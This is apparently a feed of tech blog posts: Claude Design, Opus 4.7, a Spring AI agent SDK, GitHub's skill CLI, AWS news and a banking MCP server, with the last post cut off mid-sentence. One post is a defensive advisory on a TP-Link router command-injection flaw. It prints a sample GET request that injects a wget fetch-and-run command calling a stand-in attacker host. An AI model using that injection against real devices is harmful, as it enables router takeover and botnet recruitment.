DEV Community: Om Shree

Anthropic Just Launched Claude Design. Here's What It Actually Changes for Non-Designers.

Om Shree — Sun, 19 Apr 2026 05:31:03 +0000

Figma has been the unchallenged design layer for product teams for years. On April 17, 2026, Anthropic quietly placed a bet that the next design tool doesn't look like Figma at all — it looks like a conversation.

The Problem It's Solving

Design has always had a bottleneck that nobody talks about openly: the distance between the person with the idea and the person who can execute it. A founder has a vision for a landing page. A PM sketches a feature flow on a whiteboard. A marketer needs a campaign asset by end of day. In every case, they're either waiting on a designer, wrestling with a tool that wasn't built for them, or shipping something that looks like it was made in a hurry — because it was.

Even experienced designers face a version of this. Exploration is rationed. There's rarely time to prototype ten directions when you have two days before a stakeholder review. So teams commit early, iterate less, and ship with more uncertainty than they'd like.

Claude Design is Anthropic's answer to both problems simultaneously.

How It Actually Works

The product is powered by Claude Opus 4.7, Anthropic's latest and most capable vision model. The core loop is simple: describe what you need, Claude builds a first version, and you refine it through conversation. But the details of how that refinement works are what separate this from a glorified prompt-to-image tool.

You can comment inline on specific elements — not the whole design, a specific button or heading. You can edit text directly in the canvas. And in a genuinely interesting touch, Claude can generate custom adjustment sliders for spacing, color, and layout that let you tune parameters live without writing another prompt.

The brand system integration is the piece that makes this credible for actual teams rather than solo experiments. During onboarding, Claude reads your codebase and design files and assembles a design system — your colors, typography, components. Every project after that uses it automatically. Teams can maintain multiple systems and switch between them per project.

Input is flexible: start from a text prompt, upload images, DOCX, PPTX, or XLSX files, or point Claude at a codebase. There's also a web capture tool that grabs elements directly from your live site, so prototypes match the real product rather than approximating it.

Collaboration is organization-scoped. Designs can be kept private, shared view-only with anyone in the org via link, or opened for group editing where multiple teammates can chat with Claude together in the same canvas. Output formats include internal URLs, standalone HTML files, PDF, PPTX, and direct export to Canva.

The handoff to Claude Code is the closing piece of the loop. When a design is ready to build, Claude packages it into a handoff bundle that Claude Code can consume directly. The intent is to eliminate the translation layer between design and implementation entirely.

What Teams Are Actually Using It For

Anthropic lists six use cases, and they span a wider range of roles than you'd expect from a "design tool." Designers are using it for rapid prototyping and broad exploration. PMs are using it to sketch feature flows before handing off to engineering. Founders are turning rough outlines into pitch decks. Marketers are drafting landing pages and campaign visuals before looping in a designer to finish.

The early testimonials from teams are specific enough to be useful. Brilliant's senior product designer noted that their most complex pages — which previously required 20+ prompts in other tools — needed only 2 prompts in Claude Design. Datadog's PM described going from rough idea to working prototype before anyone leaves the room, with the output already matching their brand guidelines. Those aren't marketing abstractions; they're describing a workflow compression that most product teams would recognize as real.

Why This Is a Bigger Deal Than It Looks

The obvious read is that this is Anthropic entering the design tool market. The less obvious read is that Anthropic is extending the Claude Code workflow upward into the creative layer.

Claude Code already handles the bottom of the product development stack — reading codebases, writing and editing files, managing git workflows. Claude Design handles the top — ideation, visual prototyping, stakeholder-ready output. The handoff bundle between the two is not a nice-to-have; it's the architectural seam Anthropic is betting on. If that seam works reliably, the design-to-deployment loop stops requiring multiple tools, multiple handoffs, and multiple rounds of translation.

The Canva integration is also worth noting. Canva's CEO described the partnership as making it seamless to bring ideas from Claude Design into Canva for final polish and publishing. That positions Claude Design as the ideation and prototyping layer, with Canva as the finishing and distribution layer — rather than as direct competitors. It's a smart separation that gives Claude Design a clear lane without requiring it to replace every workflow Canva owns.

Availability and Access

Claude Design launched April 17, 2026, in research preview. It's available for Claude Pro, Max, Team, and Enterprise subscribers, included with your existing plan and counted against subscription limits. Extra usage can be enabled if you hit those limits.

Enterprise organizations get it off by default — admins enable it through Organization settings. Access is at claude.ai/design.

The research preview label matters. This is not a finished product. Anthropic says integrations with other tools are coming in the weeks ahead.

The gap between "person with an idea" and "polished thing that exists" has always been where time, money, and momentum go to die. Claude Design is a direct attempt to close it — and the Claude Code handoff suggests Anthropic is thinking about the full stack, not just the canvas.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Anthropic Just Gave Claude a Design Studio. Here's What Claude Design Actually Does.

Om Shree — Sat, 18 Apr 2026 04:44:41 +0000

Figma has been the unchallenged center of digital design for years. Yesterday, Anthropic quietly placed a bet that AI can change that.

On April 17, Anthropic launched Claude Design - a new product under its Anthropic Labs umbrella that lets you collaborate with Claude to build visual work: prototypes, slides, wireframes, landing pages, one-pagers, and more. It's powered by Claude Opus 4.7, their latest vision model, and it's rolling out in research preview for Pro, Max, Team, and Enterprise subscribers right now.

This isn't Claude generating pretty mockups you paste into Figma. This is a full design loop - ideation, iteration, export, and handoff - without ever leaving the chat.

The Problem It's Solving

Anthropic frames the core issue well: even experienced designers ration exploration. There's never enough time to prototype ten directions, so you pick two or three and commit. And for founders, PMs, and marketers who have a strong vision but no design background, turning ideas into shareable visuals has always required either hiring someone or learning tools that take months to master.

Claude Design is trying to solve both problems at once. Give designers room to explore widely. Give everyone else a way to produce visual work that doesn't look like a Canva template from 2019.

How the Workflow Actually Works

The flow is more structured than you'd expect from a chat-based tool.

Your brand gets built in first. During onboarding, Claude reads your codebase and design files to build a design system - your colors, typography, components. Every project after that inherits it automatically. No more pasting hex codes into every prompt.

You can start from anything. A text prompt, uploaded images, a DOCX, PPTX, or XLSX file, your codebase, or a live website via the web capture tool. If you want the prototype to look like your actual product, you point it at your site and Claude pulls the elements directly.

Iteration happens inline. You can comment on specific elements, edit text directly, or use custom adjustment knobs - built by Claude - to tweak spacing, color, and layout live. Then ask Claude to apply changes across the entire design at once.

Collaboration is organization-scoped. Keep designs private, share a view-only link inside your org, or grant edit access so teammates can jump into the same conversation with Claude together.

Export goes everywhere. Standalone HTML, PDF, PPTX, a shareable internal URL, or directly to Canva. The Canva integration is a first-class feature - designs land as fully editable Canva files, ready to refine and publish.

Handoff goes to Claude Code. When a design is ready to build, Claude bundles everything into a handoff package you pass to Claude Code with a single instruction. Design to implementation in one pipeline.

What Teams Are Actually Using It For

Anthropic lists six core use cases, and they're more specific than the usual "boost your productivity" marketing copy:

Realistic prototypes - Designers turn static mockups into interactive, shareable prototypes without touching code or going through PR review.
Product wireframes - PMs sketch feature flows and hand off directly to Claude Code for implementation, or to designers for refinement.
Design explorations - Quick generation of a wide range of visual directions to explore before committing.
Pitch decks and presentations - From rough outline to on-brand deck in minutes, exported as PPTX or sent to Canva.
Marketing collateral - Landing pages, social media assets, campaign visuals, ready for designer polish.
Frontier design - Code-powered prototypes with voice, video, shaders, 3D, and built-in AI.

That last one is the most interesting. "Frontier design" positions this beyond Figma's territory entirely - into interactive, AI-native artifacts that traditional design tools can't produce at all.

What Early Users Are Saying

Three companies shared early reactions, and the numbers are specific enough to be credible.

Brilliant, the interactive learning platform, noted that their most complex pages - which previously took 20+ prompts to recreate in other tools - required only 2 prompts in Claude Design. Their Senior Product Designer called the prototype-to-production handoff with Claude Code "seamless."

Datadog's product team reported going from rough idea to working prototype before anyone leaves the room. Work that previously took a week of back-and-forth between briefs, mockups, and review rounds now happens in a single conversation.

Canva co-founder and CEO Melanie Perkins framed the integration as a natural extension of their mission - bringing Canva to wherever ideas begin. When a design exits Claude Design into Canva, it becomes fully editable and collaborative immediately.

Why This Is a Bigger Deal Than It Looks

Most AI design tools have been wrappers - you describe something, get an image, manually replicate it in your actual design tool. Claude Design is different in structure. The brand system, the inline editing, the Claude Code handoff, the Canva export - these aren't convenience features. They're the infrastructure of a complete design workflow.

What Anthropic is building here is a design agent, not a design assistant. One that holds context about your brand, your product, your team's work, and the full history of a project. That's the same pattern we've seen with Claude Code in engineering - an AI that doesn't just answer questions but participates in the actual production pipeline.

The implications for teams without dedicated design resources are significant. A founder with a clear vision and access to Claude Pro can now go from napkin sketch to investor-ready prototype without a single design hire. A PM can produce a feature wireframe precise enough to hand off to engineering directly. A marketer can generate a campaign landing page in a conversation.

Availability and Access

Claude Design is available now in research preview for Pro, Max, Team, and Enterprise subscribers at claude.ai/design. Access is included in your existing plan and uses your subscription limits, with the option to enable extra usage if you go beyond them.

For Enterprise orgs, it's off by default - admins can enable it via Organization settings.

Anthropic says integrations with more tools are coming in the next few weeks.

Design just became part of the agentic stack. The question now is how fast the design community actually adopts it - and what Figma does next.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

CVE-2023-33538: The TP-Link Command Injection Flaw That's Still Being Actively Exploited

Om Shree — Fri, 17 Apr 2026 16:48:09 +0000

A vulnerability disclosed in 2023 is back in the news — because attackers are actively using it right now.

CVE-2023-33538 is a command injection bug with a CVSS score of 8.8 The Hacker News in several TP-Link home router models. CISA added it to its Known Exploited Vulnerabilities catalog in June 2025 CVE Details , and Unit 42 researchers confirmed active exploitation attempts shortly after. The situation is messier than most CVE alerts because the affected products are end-of-life, meaning no vendor patches are available CVE Details . The fix is to throw the router away.

What's Vulnerable

Three discontinued TP-Link router models are affected: TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. CinchOps, Inc. These are mass-market home routers. Millions were sold. A lot of them are still plugged in.

How the Vulnerability Works

The /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request. The parameter value is not sanitized when the router processes it, so an attacker can send commands directly through it — allowing remote code execution on the device. Palo Alto Networks

The attack surface is the router's web management interface. The flaw requires no authentication to exploit in some configurations, meaning attackers can compromise vulnerable routers without needing login credentials or physical access. CinchOps, Inc. That said, Unit 42's deeper analysis found a wrinkle: successful exploitation actually requires authentication to the router's web interface paloaltonetworks — which in practice isn't much of a barrier, since most of these devices still run default credentials.

A typical exploit request looks like this:

GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork;wget+http://attacker.com/payload+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x HTTP/1.1
Host: 192.168.1.1

The ssid1 parameter accepts the injected commands. The router executes them without validation.

What Attackers Are Actually Doing

The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices. Palo Alto Networks The pattern is straightforward: find the router, authenticate with default credentials, inject a wget command to pull down a binary, make it executable, run it.

Unit 42's analysis uncovered something interesting though. The exploit attempts contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, the exploits are incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter on the target system is ssid1. Palo Alto Networks

So the attacks in the wild are technically flawed. They'd fail on a properly configured device. But that doesn't mean the underlying vulnerability isn't real — it is. It just means the botnet operators got the parameter name wrong, and the vulnerability is still wide open for anyone who looks at the original disclosure more carefully.

The Botnet Connection

In December 2024, Palo Alto Networks Unit 42 identified samples of an OT-centric malware called FrostyGoop. One of the IP addresses associated with an ENCO control device was also linked to a TP-Link WR740N router used to facilitate web browser access to the ENCO device. SecPod Blog Direct evidence tying CVE-2023-33538 to that specific attack doesn't exist, but the association illustrates the real-world risk: compromised home routers becoming pivot points into operational technology networks, including industrial systems.

Compromised routers can also be recruited into botnets to launch DDoS attacks, used to steal data transmitted through the network, or serve as a gateway to deploy malware on connected devices. SecPod Blog

Why This Is Still a Problem in 2025

The vulnerability was first disclosed in June 2023. TP-Link discontinued these router models in 2017. The combination of old hardware, no patch, and default credentials still in place on deployed devices is exactly the kind of long tail that keeps security researchers employed.

TP-Link told The Hacker News that it provided fixes through its tech support platform since 2018, and encouraged customers to contact support for patched firmware or to upgrade their devices. The Hacker News The practical reality: most people who bought a TP-Link router eight years ago are not checking in with TP-Link support for firmware updates. The router is just sitting there, doing its job, running software from a decade ago.

The EPSS score for this vulnerability sits at 90.63% probability of exploitation activity in the next 30 days CVE Details — that puts it in roughly the top percentile of all tracked CVEs for active exploitation risk.

What To Do

If you own or manage any of the affected models (TL-WR940N V2/V4, TL-WR841N V8/V10, TL-WR740N V1/V2), the recommendation is unambiguous: replace the device. There is no patch coming.

If replacement isn't immediate:

Disable remote management (usually under "Remote Management" or "Web Management" in router settings)
Change default admin credentials to something non-trivial
Segment the router from critical devices on your network
Monitor for unusual outbound traffic

For organizations doing network audits, these models will surface in legacy environments, branch offices, and home office setups for employees on VPN. They're worth explicitly checking for.

The Broader Pattern

CVE-2023-33538 is not an exotic vulnerability. It's a missing input sanitization check on a parameter that processes user input. The fix at the code level would have been a few lines. The real problem is that the devices were EOL before the vulnerability was even publicly documented, which means there's no vendor support left to deploy a fix.

This pattern keeps repeating. Old IoT hardware, no update mechanism, default credentials, perpetually connected. The Mirai botnet first appeared in 2016 exploiting default credentials on IoT devices. Eight years later, the same playbook still works on millions of deployed devices.

The vulnerability isn't the interesting part. The infrastructure that keeps these devices running for a decade after the vendor stopped caring is.

References:

Spring AI SDK for Amazon Bedrock AgentCore: Build Production-Ready Java AI Agents

Om Shree — Fri, 17 Apr 2026 02:51:56 +0000

Java developers have always had a rough deal with agentic AI. The proof of concepts are easy enough — wrap a model call, return a string. But taking that to production means custom controllers, SSE streaming handlers, health check endpoints, rate limiting, memory repositories... weeks of infrastructure work before you've written a single line of actual agent logic.

AWS just GA'd the Spring AI AgentCore SDK, and it collapses most of that into a single annotation.

What's Amazon Bedrock AgentCore

AgentCore is AWS's managed platform for running AI agents at scale. It handles the infrastructure layer — scaling, reliability, security, observability — and provides building blocks like short and long-term memory, browser automation, and sandboxed code execution.

The problem until now: integrating all of that into a Spring application required implementing the AgentCore Runtime contract yourself. Two specific endpoints (/invocations and /ping), SSE streaming with proper framing, health status signaling for long-running tasks, and all the Spring wiring on top. Not impossible, but tedious and error-prone.

The SDK handles all of it automatically.

The Core Idea: One Annotation

Here's a complete, AgentCore-compatible AI agent:

@Service
public class MyAgent {

    private final ChatClient chatClient;

    public MyAgent(ChatClient.Builder builder) {
        this.chatClient = builder.build();
    }

    @AgentCoreInvocation
    public String chat(PromptRequest request) {
        return chatClient.prompt()
            .user(request.prompt())
            .call()
            .content();
    }
}

record PromptRequest(String prompt) {}

The @AgentCoreInvocation annotation auto-configures the /invocations POST endpoint and the /ping health endpoint, handles JSON serialization, detects async tasks and reports busy status so AgentCore doesn't scale down mid-execution, and manages response formatting. No custom controllers.

Want streaming? Change the return type:

@AgentCoreInvocation
public Flux<String> streamingChat(PromptRequest request) {
    return chatClient.prompt()
        .user(request.prompt())
        .stream()
        .content();
}

The SDK switches to SSE output automatically and handles framing, backpressure, and connection lifecycle.

Adding Memory

The SDK integrates AgentCore Memory through Spring AI's advisor pattern — interceptors that enrich prompts with context before they hit the model.

Short-term memory uses a sliding window of recent messages. Long-term memory persists across sessions using four strategies: semantic (factual user info), user preference (explicit settings), summary (condensed history), and episodic (past interactions). AgentCore consolidates these asynchronously.

Configuration is minimal:

agentcore.memory.memory-id=${AGENTCORE_MEMORY_ID}
agentcore.memory.long-term.auto-discovery=true

Then compose it into your chat client:

@AgentCoreInvocation
public String chat(PromptRequest request, AgentCoreContext context) {
    String sessionId = context.getHeader(AgentCoreHeaders.SESSION_ID);

    return chatClient.prompt()
        .user(request.prompt())
        .advisors(agentCoreMemory.advisors)
        .advisors(a -> a.param(ChatMemory.CONVERSATION_ID, "user:" + sessionId))
        .call()
        .content();
}

Auto-discovery mode detects available LTM strategies without manual configuration.

Browser and Code Execution as Tools

AgentCore exposes two additional capabilities as Spring AI tool callbacks via ToolCallbackProvider:

Browser automation — agents can navigate websites, extract content, take screenshots, and interact with page elements.

Code interpreter — agents write and run Python, JavaScript, or TypeScript in a secure sandbox. The sandbox includes numpy, pandas, and matplotlib. Generated files go through an artifact store.

Both are added as Maven dependencies and wired in through the constructor:

public MyAgent(
    ChatClient.Builder builder,
    AgentCoreMemory agentCoreMemory,
    @Qualifier("browserToolCallbackProvider") ToolCallbackProvider browserTools,
    @Qualifier("codeInterpreterToolCallbackProvider") ToolCallbackProvider codeInterpreterTools) {

    this.chatClient = builder
        .defaultToolCallbacks(browserTools, codeInterpreterTools)
        .build();
}

The model decides which tool to call based on the user's request. Both tools are visible equally.

MCP Integration via AgentCore Gateway

Spring AI agents can connect to organizational tools through AgentCore Gateway, which provides MCP support with outbound authentication and a semantic tool registry. Configure your Spring AI MCP client to point at Gateway:

spring.ai.mcp.client.toolcallback.enabled=true
spring.ai.mcp.client.initialized=false
spring.ai.mcp.client.streamable-http.connections.gateway.url=${GATEWAY_URL}

Gateway handles credential management for downstream services. Agents discover and invoke enterprise tools without managing auth themselves.

Deployment Options

AgentCore Runtime — package as an ARM64 container, push to ECR, create a Runtime pointing at the image. AWS handles scaling, health monitoring, pay-per-use pricing (no charge for idle compute). Terraform examples are in the repo.

Standalone — use individual modules (Memory, Browser, Code Interpreter) in applications running on EKS, ECS, EC2, or on-premises. Teams can adopt incrementally — add memory to an existing Spring Boot service before considering a full migration to AgentCore Runtime.

Design Principles

The SDK is built around three ideas: convention over configuration (sensible defaults, port 8080, standard endpoint paths), annotation-driven development (one annotation replaces weeks of infrastructure code), and deployment flexibility (you're not locked into AgentCore Runtime to use the individual modules).

It's open source under Apache 2.0. The repo has five example applications ranging from a minimal agent to a full OAuth-authenticated setup with per-user memory isolation.

What's Coming

The team has flagged three upcoming additions: observability integration with CloudWatch, LangFuse, Datadog, and Dynatrace via OpenTelemetry; an evaluations framework for testing agent response quality; and advanced identity management for streamlined security context handling.

Getting Started

<dependency>
    <groupId>org.springaicommunity</groupId>
    <artifactId>spring-ai-agentcore-runtime-starter</artifactId>
</dependency>

Repo: github.com/spring-ai-community/spring-ai-agentcore

Docs: docs.aws.amazon.com/bedrock-agentcore

There's also a four-hour workshop that walks through building a travel and expense management agent from scratch — memory, browser, code execution, MCP integration, deployed serverless with auth. No ML experience required.

I cover AI infrastructure and developer tools at Shreesozo Yt Channel. AI Infra Weekly drops every Friday.

Everything You Need to Know About Claude Opus 4.7

Om Shree — Fri, 17 Apr 2026 02:41:18 +0000

Anthropic dropped Claude Opus 4.7 yesterday. It's a direct upgrade to Opus 4.6 — same price, same API shape, meaningfully better at the things that actually matter for production agentic work.

Here's what changed and what you actually need to know before migrating.

The Core Improvements

Coding and agentic tasks

This is where the biggest gains are. Opus 4.7 is noticeably better on hard, long-running coding problems — the kind where Opus 4.6 would stall, loop, or hand back something half-finished.

Cursor saw a 70% pass rate on their internal benchmark, up from 58% with Opus 4.6. CodeRabbit saw 10%+ recall improvement on difficult PRs. Notion's agent team reported 14% better task completion at fewer tokens and a third of the tool errors. Rakuten's SWE-Bench testing showed Opus 4.7 resolving 3x more production tasks.

What's actually different under the hood: the model is better at verifying its own outputs before reporting back. It catches its own logical faults during planning. It pushes through tool failures that used to stop the previous model cold. For agentic workflows, that consistency matters more than raw benchmark numbers.

Instruction following — with a catch

Opus 4.7 is substantially more literal about following instructions. That sounds straightforwardly good, and it mostly is. But there's a real migration implication: prompts written for earlier Claude models assumed some loose interpretation. Opus 4.7 takes instructions at face value. If your prompt says something ambiguous, you'll get a more literal result than you expected.

Worth auditing your existing prompts before switching over.

Vision: 3x the resolution

Opus 4.7 now accepts images up to 2,576 pixels on the long edge, roughly 3.75 megapixels. Previous Claude models topped out at about 1.15 megapixels. This is a model-level change — you don't need to change anything in your API calls. Images just get processed at higher fidelity automatically.

What this unlocks in practice: dense screenshots for computer-use agents, complex technical diagrams, chemical structures, any visual work where the detail actually matters. XBOW, which builds autonomous penetration testing tools, saw their visual acuity benchmark go from 54.5% with Opus 4.6 to 98.5%. That's not a marginal improvement — that's a different class of capability.

One note: higher resolution means more tokens consumed. If you don't need the extra fidelity, downsample before sending.

Memory across sessions

Opus 4.7 is better at using filesystem-based memory. It carries notes forward across long multi-session work and uses them to reduce the setup overhead on new tasks. For anyone running multi-day agentic workflows, this is genuinely useful.

New API Features Launching Alongside

xhigh effort level

There's a new effort tier between high and max. The full ladder is now: low → medium → high → xhigh → max. In Claude Code, Anthropic has raised the default to xhigh for all plans.

For coding and agentic use cases, Anthropic recommends starting with high or xhigh. Max effort is there for the hardest problems where you want to throw everything at it.

Task budgets (public beta)

Developers can now set token spend budgets on the API, giving Claude a way to allocate effort across longer runs rather than burning all its compute on early steps. Useful for agentic pipelines where you want the model to prioritize intelligently.

/ultrareview in Claude Code

A new slash command that produces a dedicated review session — reads through your changes and flags bugs and design issues a careful reviewer would catch. Pro and Max users get three free ultrareviews to try it out.

Auto mode extended to Max users

Auto mode lets Claude make tool-use decisions on your behalf, so you can run longer tasks with fewer interruptions. Previously limited, now available to Max plan users.

The Cybersecurity Angle

This one is worth understanding properly.

Last week Anthropic announced Project Glasswing, which assessed AI risks in cybersecurity. They stated they'd keep Claude Mythos Preview limited and test new cyber safeguards on less capable models first.

Opus 4.7 is the first model in that pipeline. Its cyber capabilities are intentionally less advanced than Mythos Preview — Anthropic experimented with selectively reducing these during training. And it ships with automatic safeguards that detect and block prohibited or high-risk cybersecurity requests.

If you do legitimate security work — vulnerability research, penetration testing, red-teaming — there's a new Cyber Verification Program you can apply to join. That gets you access to the capabilities that would otherwise be blocked.

Pricing and Availability

Same as Opus 4.6: $5 per million input tokens, $25 per million output tokens.

Available via Claude.ai, the API (claude-opus-4-7), Amazon Bedrock, Google Cloud Vertex AI, and Microsoft Foundry.

Migration Notes

Two things that affect token usage when moving from Opus 4.6:

First, Opus 4.7 uses an updated tokenizer. The same input can map to roughly 1.0–1.35x more tokens depending on content type. This varies — code and structured text tend toward the higher end.

Second, the model thinks more at higher effort levels, especially on later turns in agentic settings. More output tokens per complex task.

Anthropic's own testing shows the net effect is favorable on coding evaluations, but the right move is to measure it on your actual traffic before committing. They've published a migration guide at platform.claude.com/docs/en/about-claude/models/migration-guide.

Should You Upgrade

For straightforward API usage, yes. Same price, better results across coding, vision, and long-horizon tasks. The tokenizer change means costs may shift slightly but the model is more efficient in how it uses those tokens.

For production agentic pipelines, audit your prompts first. The stricter instruction following is a feature, but it will surface ambiguities in prompts that Opus 4.6 quietly papered over. Fix those before flipping the switch.

I cover Anthropic model releases and agentic AI infrastructure at our Yt channel. MCP Weekly drops every Monday.

`gh skill`: GitHub's New CLI Command Turns Agent Skills Into Installable Packages

Om Shree — Thu, 16 Apr 2026 22:31:59 +0000

I've been using SKILL.md files in my local Claude Code setup for months. Custom instructions for different tasks, each living in its own folder, each teaching the agent how to behave for a specific workflow. Works well. The annoying part has always been distribution — if I want to reuse a skill on another machine, I'm copying files manually like it's 2012.

GitHub apparently had the same frustration. Last week they shipped gh skill, a new GitHub CLI command that does for agent skills what npm did for packages.

What Even Are Agent Skills

Skills are SKILL.md files — folders of instructions, scripts, and resources that tell an AI agent how to handle a specific task. Write a documentation page. Run a specific test pattern. Format output a certain way.

They follow the open Agent Skills spec at agentskills.io and work across GitHub Copilot, Claude Code, Cursor, Codex, and Gemini CLI. The skill doesn't know or care which agent loads it.

What Shipped

Requires GitHub CLI v2.90.0 or later.

Install a skill:

gh skill install github/awesome-copilot documentation-writer

Target a specific agent and scope:

gh skill install github/awesome-copilot documentation-writer --agent claude-code --scope user

Skills go to the correct directory for your agent host automatically. No manual path work.

Pin to a version:

gh skill install github/awesome-copilot documentation-writer --pin v1.2.0

# Or pin to a commit for full reproducibility
gh skill install github/awesome-copilot documentation-writer --pin abc123def

Pinned skills get skipped during gh skill update --all, so upgrades are deliberate.

Check for updates:

gh skill update           # interactive
gh skill update --all     # everything at once

Validate and publish your own:

gh skill publish          # validate against agentskills.io spec
gh skill publish --fix    # auto-fix metadata issues

The Supply Chain Part

This is less flashy but it's the part that actually matters.

Agent skills are instructions. Instructions that shape what an AI agent does inside your codebase. A silently modified skill is a real attack surface — same as a tampered npm package, just newer.

gh skill handles this with a few concrete mechanisms:

When you install a skill, it writes provenance metadata directly into the SKILL.md frontmatter — source repo, ref, and git tree SHA. On every gh skill update call, local SHAs get compared against remote. It detects actual content changes, not just version bumps.

Publishers can enable immutable releases, meaning release content can't be altered after publication — even by repo admins. If you pin to a tag from an immutable release, you're fully protected even if the repo gets compromised later.

The provenance data lives inside the skill file itself, so it travels with the skill when it gets moved, copied, or reorganized.

Why This Is a Bigger Deal Than It Looks

The SKILL.md pattern has been spreading quietly for months. Anthropic has a reference skills repo. GitHub's awesome-copilot has a growing community collection. VS Code ships skill support. Claude Code loads them automatically.

What was missing was tooling. Right now, sharing a skill means sending a file. Updating a skill means remembering where you put it. There's no dependency graph, no version history, no integrity check.

gh skill is the package manager layer the ecosystem needed. It's early — the spec is still young, the community repo is still small — but the primitives are solid. Git tags for versioning. SHAs for integrity. Frontmatter for portable provenance.

If you maintain skills for your team or your own agent setup, the publish workflow is worth looking at now, before the ecosystem gets crowded.

gh extension upgrade --all   # make sure you're on v2.90.0+
gh skill install github/awesome-copilot documentation-writer

Building content around MCP and agentic AI? I write about this stuff weekly Here !!!

AWS This Week: Claude Mythos Is a Cybersecurity Model, Agent Registry Supports MCP, and More

Om Shree — Thu, 16 Apr 2026 00:32:26 +0000

Claude Mythos is live on Amazon Bedrock. Sort of.

It's a gated research preview — meaning you can't just sign up and start using it. Access is limited to what AWS calls "allowlisted organizations," with Anthropic and AWS prioritizing internet-critical companies and open source maintainers. The program is called Project Glasswing, and it's not for general use yet.

What makes Mythos different from Anthropic's other models is the focus. This one is built specifically for cybersecurity work: identifying vulnerabilities in software, analyzing large codebases, and complex security reasoning. Anthropic is pitching it as a tool for security teams to find and fix issues before they become incidents. Whether it actually delivers on that is hard to evaluate when almost nobody can access it, but the direction is interesting — a model class purpose-built for a specific high-stakes domain rather than a general assistant with security added on top.

AWS Agent Registry: MCP server included

The other headline this week is AWS Agent Registry, which launched in preview through Amazon Bedrock AgentCore.

The idea is straightforward: as organizations build more AI agents, they end up with a sprawl problem. Teams duplicate tools. Nobody knows what already exists. Agent Registry is meant to be the internal catalog that fixes that — a searchable directory of agents, tools, skills, and MCP servers that teams can discover and reuse.

What caught my attention is that the registry itself is accessible as an MCP server. You can query it directly from your IDE, which makes the discovery workflow a lot more practical than navigating another console. It also ships with approval workflows and CloudTrail audit trails, so there's governance built in from the start.

For anyone working in the MCP space, this is worth watching. AWS is essentially treating MCP servers as first-class citizens in their agent infrastructure catalog.

Other stuff from this week

S3 Files — Amazon S3 now supports mounting buckets as file systems, built on EFS technology. The pitch is that your applications can access the same S3 data through both file system APIs and the S3 API without changing code. Multi-terabyte per second read throughput, actively used data cached. If you've ever had to choose between EFS and S3 for a workload, this is interesting.

OpenSearch + Managed Prometheus — OpenSearch Service added native Prometheus integration with direct PromQL support, plus OpenTelemetry GenAI semantic convention support for tracing LLM execution. The agent tracing part is the relevant bit if you're running AI infrastructure — you can now correlate slow traces back to logs and overlay Prometheus metrics in one place instead of jumping between tools.

Bedrock IAM cost allocation — You can now tag IAM principals with attributes like team or cost center, and that data flows into Cost Explorer and the detailed Cost and Usage Report. Useful if you're trying to track which teams are actually spending what on model inference, especially as agent workloads scale up.

Rigetti Cepheus on Braket — Amazon Braket added Rigetti's 108-qubit Cepheus QPU, which is the first 100+ qubit superconducting processor on the platform. Supports Braket SDK, Qiskit, CUDA-Q, and Pennylane. Niche, but notable if you're in the quantum computing space.

Quick take

The Mythos announcement is the one I'm most curious about. Cybersecurity is an interesting choice for a purpose-built model — it's a domain where hallucinations have real consequences, so the bar for reliability is higher than most use cases. The gating makes sense given that. What Anthropic decides to do with access over the next few months will probably tell us more about where this category is going than the launch announcement does.

Agent Registry is the more immediately practical release. If your team is building with agents, a centralized catalog with MCP server access and audit trails is the kind of boring infrastructure that actually matters.

Banks Got Their First MCP Server. Here's What Nymbus Actually Built.

Om Shree — Sun, 12 Apr 2026 19:06:03 +0000

Banking and AI have had a complicated relationship. Not because banks didn't want to use AI - they did. Every institution was running pilots, testing chatbots, deploying some flavor of large language model to field customer queries.

The problem was more fundamental.

The AI could talk. It couldn't do anything.

Customer lookup, account management, card controls, money movement - all of it locked behind legacy core systems that weren't designed to be touched by an LLM. Getting AI access to any one of those functions required a custom integration. A separate build for every use case. A different engineering project every time the institution wanted to try something new.

You can't build agentic banking on that foundation. The integration debt alone cancels out any efficiency gains.

According to McKinsey's Global Banking Annual Review 2025, 71% of banking executives said AI would materially reshape their operating models. But most deployments stayed at the assistant layer - generating answers, not executing work. The infrastructure to go deeper wasn't there.

Nymbus just addressed that infrastructure gap.

What Nymbus Actually Shipped

On April 9, 2026, Nymbus - a cloud-native banking platform serving U.S. banks and credit unions - announced the launch of what it describes as one of the first secure Model Context Protocol servers purpose-built for core banking.

The framing matters here. This isn't a chatbot product. It's not an AI assistant layer sitting on top of banking data. It's a standardized connection layer between AI agents and core banking functions, built on the open MCP standard Anthropic introduced in November 2024.

The server ships with 19 front-office tools out of the box, covering the most common service-layer tasks banks deal with daily:

Customer lookup and identity verification
Account management and details retrieval
Debit card controls (including card freezes)
Money movement
General front-office service workflows

A service agent can handle all of these through a single conversational interface. No switching between systems. No re-integration when a new AI tool gets added to the stack.

Where legacy cores needed a custom build for each use case, this is one standardized connection layer for all of them.

"AI creates real value in banking when it helps institutions get work done, not just generate answers."

Jeffery Kendall, Chairman and CEO, Nymbus

The Security Architecture (This Is the Part That Actually Matters)

For any financial institution reading about agentic AI, the first question isn't "what can it do?" It's "what can we prevent it from doing?"

Regulated environments don't hand over system access and hope for the best. They need control surfaces.

Nymbus built the governance model into the server itself. Each institution decides:

Which of the 19 tools are active
Which employee roles can access which tools
Which actions require human review and approval before execution

Layered on top: token-based authentication, PII masking in logs, encrypted connections, and full audit trails.

The AI agent operates exactly within the permissions the institution has defined. Not a call more.

"The Nymbus MCP Server helps banks augment existing processes with AI-assisted workflows that can speed up research, reduce manual effort, and support better decisions, while giving each institution granular control over what is enabled, how it is used, and where governance and auditability are required."

Matthew Terry, CTO, Nymbus

This is worth sitting with for a second. Banking compliance isn't just about what the AI does - it's about what you can prove it did. Full audit trails, access logs, and configurable human-in-the-loop checkpoints aren't nice-to-haves for a regulated institution. They're the difference between a deployable product and a liability.

Why MCP? And Why Now?

The choice of MCP as the protocol isn't incidental. It's the strategic bet underneath this whole product.

MCP was introduced by Anthropic in November 2024 as an open standard for connecting AI systems to real-world data and tools. The adoption curve since has been fast:

